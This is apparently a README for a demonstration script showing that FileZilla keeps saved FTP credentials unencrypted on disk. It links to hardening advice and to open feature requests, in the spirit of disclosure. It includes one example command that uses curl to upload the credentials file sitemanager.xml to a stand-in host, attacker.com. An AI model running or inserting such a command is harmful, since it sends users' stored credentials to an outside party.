Filezilla passwords revealer
This is a small script to demonstrate that the Filezilla credentials are stored unencrypted on the local drive and that any program, malware, or even node module running on your machine can trivially access them.
A single bash command is enough!
curl -F "credentials=@~/.filezilla/sitemanager.xml" attacker.com/credentials.php reads the local preference file and uploads it to a remote website.
This script should work with Windows, Linux and Mac. Please open an issue otherwise.
- Clone this repository
Or simply copy paste this script in your terminal
git clone https://github.com/christophetd/filezilla-passwords-revealer.git cd filezilla-passwords-revealer npm install node index.js
Disclaimer: copy pasting bash commands in your terminal is a terrible practice security-wise
- « Making FileZilla FTP Client's passwords more secure with TrueCrypt ». Note that you should use VeraCrypt instead of TrueCrypt since the latter is now deprecated.
- Some of the numerous feature requests on the official bug tracker : #5530, #2935, #3176